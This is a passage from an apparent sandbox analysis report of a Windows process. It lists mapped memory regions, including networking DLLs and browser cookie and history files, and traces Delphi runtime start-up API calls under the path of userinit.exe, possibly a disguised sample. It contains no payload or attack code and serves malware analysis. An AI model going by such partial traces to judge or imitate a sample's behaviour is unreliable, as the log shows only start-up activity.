end_va = 0x2caffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 2722
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 2723
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 2724
start_va = 0x2cb0000
end_va = 0x2f7efff
entry_point = 0x2cb0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2737
start_va = 0x1b0000
end_va = 0x1b1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 2738
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 2739
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x1c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2740
start_va = 0x1d0000
end_va = 0x1d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2741
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2742
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2743
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 2744
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2745
start_va = 0x3b0000
end_va = 0x3dbfff
entry_point = 0x3b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 2746
start_va = 0x3e0000
end_va = 0x3e7fff
entry_point = 0x3e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 2747
start_va = 0x3f0000
end_va = 0x3fffff
entry_point = 0x3f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 2748
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2749
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2750
start_va = 0x2f80000
end_va = 0x308ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f80000"
filename = ""
Region:
id = 2751
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2752
start_va = 0x3090000
end_va = 0x32affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003090000"
filename = ""
Region:
id = 2753
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2754
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2763
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2764
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2765
start_va = 0xe30000
end_va = 0xeeffff
entry_point = 0xe30000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 223
os_tid = 0xf4c
[0086.609] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0086.609] GetKeyboardType (nTypeFlag=0) returned 4
[0086.609] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0086.609] GetStartupInfoA (in: lpStartupInfo=0x12f9b4 | out: lpStartupInfo=0x12f9b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0086.609] GetVersion () returned 0x1db10106
[0086.609] GetVersion () returned 0x1db10106
[0086.609] GetCurrentThreadId () returned 0xf4c
[0086.609] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12f4b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0086.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f38b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0086.609] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12f4a0 | out: phkResult=0x12f4a0*=0x0) returned 0x2
[0086.610] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12f4a0 | out: phkResult=0x12f4a0*=0x0) returned 0x2
[0086.610] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12f4a0 | out: phkResult=0x12f4a0*=0x0) returned 0x2
[0086.610] lstrcpynA (in: lpString1=0x12f38b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0086.610] GetThreadLocale () returned 0x409
[0086.610] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x12f49b, cchData=5 | out: lpLCData="ENU") returned 4
[0086.611] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0086.611] lstrcpynA (in: lpString1=0x12f3a8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0086.611] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0086.611] lstrcpynA (in: lpString1=0x12f3a8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0086.611] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0086.611] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0086.611] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1f3640
[0086.611] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0086.611] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1f4640
[0086.611] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x12f5d4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0086.612] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x12f5c0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0086.613] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12f5c0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0086.613] GetVersionExA (in: lpVersionInformation=0x12f958*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12f958*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0086.613] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0086.613] GetThreadLocale () returned 0x409
[0086.613] GetThreadLocale () returned 0x409
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x12f830, cchData=256 | out: lpLCData="Jan") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x12f830, cchData=256 | out: lpLCData="January") returned 8
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x12f830, cchData=256 | out: lpLCData="Feb") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x12f830, cchData=256 | out: lpLCData="February") returned 9
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x12f830, cchData=256 | out: lpLCData="Mar") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f830, cchData=256 | out: lpLCData="March") returned 6
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x12f830, cchData=256 | out: lpLCData="Apr") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f830, cchData=256 | out: lpLCData="April") returned 6
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x12f830, cchData=256 | out: lpLCData="May") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f830, cchData=256 | out: lpLCData="May") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x12f830, cchData=256 | out: lpLCData="Jun") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f830, cchData=256 | out: lpLCData="June") returned 5
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f830, cchData=256 | out: lpLCData="Jul") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f830, cchData=256 | out: lpLCData="July") returned 5
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f830, cchData=256 | out: lpLCData="Aug") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f830, cchData=256 | out: lpLCData="August") returned 7
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f830, cchData=256 | out: lpLCData="Sep") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x12f830, cchData=256 | out: lpLCData="September") returned 10
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f830, cchData=256 | out: lpLCData="Oct") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x12f830, cchData=256 | out: lpLCData="October") returned 8
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f830, cchData=256 | out: lpLCData="Nov") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x12f830, cchData=256 | out: lpLCData="November") returned 9
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f830, cchData=256 | out: lpLCData="Dec") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x12f830, cchData=256 | out: lpLCData="December") returned 9
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x12f830, cchData=256 | out: lpLCData="Sun") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x12f830, cchData=256 | out: lpLCData="Sunday") returned 7
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x12f830, cchData=256 | out: lpLCData="Mon") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f830, cchData=256 | out: lpLCData="Monday") returned 7
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x12f830, cchData=256 | out: lpLCData="Tue") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f830, cchData=256 | out: lpLCData="Tuesday") returned 8
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x12f830, cchData=256 | out: lpLCData="Wed") returned 4
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f830, cchData=256 | out: lpLCData="Wednesday") returned 10
[0086.613] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x12f830, cchData=256 | out: lpLCData="Thu") returned 4
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f830, cchData=256 | out: lpLCData="Thursday") returned 9
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x12f830, cchData=256 | out: lpLCData="Fri") returned 4
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f830, cchData=256 | out: lpLCData="Friday") returned 7
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x12f830, cchData=256 | out: lpLCData="Sat") returned 4
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f830, cchData=256 | out: lpLCData="Saturday") returned 9
[0086.614] GetThreadLocale () returned 0x409
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x12f88c, cchData=256 | out: lpLCData="$") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f88c, cchData=256 | out: lpLCData="0") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f88c, cchData=256 | out: lpLCData="0") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x12f984, cchData=2 | out: lpLCData=",") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x12f984, cchData=2 | out: lpLCData=".") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x12f88c, cchData=256 | out: lpLCData="2") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x12f984, cchData=2 | out: lpLCData="/") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f88c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0086.614] GetThreadLocale () returned 0x409
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f858, cchData=256 | out: lpLCData="1") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x12f88c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0086.614] GetThreadLocale () returned 0x409
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f858, cchData=256 | out: lpLCData="1") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x12f984, cchData=2 | out: lpLCData=":") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x12f88c, cchData=256 | out: lpLCData="AM") returned 3
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x12f88c, cchData=256 | out: lpLCData="PM") returned 3
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x12f88c, cchData=256 | out: lpLCData="0") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x12f88c, cchData=256 | out: lpLCData="0") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f88c, cchData=256 | out: lpLCData="0") returned 2
[0086.614] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x12f984, cchData=2 | out: lpLCData=",") returned 2
[0086.614] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0086.614] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0086.614] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0086.615] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0086.616] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0086.616] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0086.616] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0086.616] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0086.616] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0086.616] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0086.616] GetDC (hWnd=0x0) returned 0x2b010799
[0086.616] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.616] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.616] GetDC (hWnd=0x0) returned 0x2b010799
[0086.616] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0086.616] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.616] CreatePalette (plpal=0x12f5e8) returned 0x7080834
[0086.616] GetStockObject (i=7) returned 0x1b00017
[0086.617] GetStockObject (i=5) returned 0x1900015
[0086.617] GetStockObject (i=13) returned 0x18a002e
[0086.617] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.617] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0086.617] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0086.617] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x12f5e4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
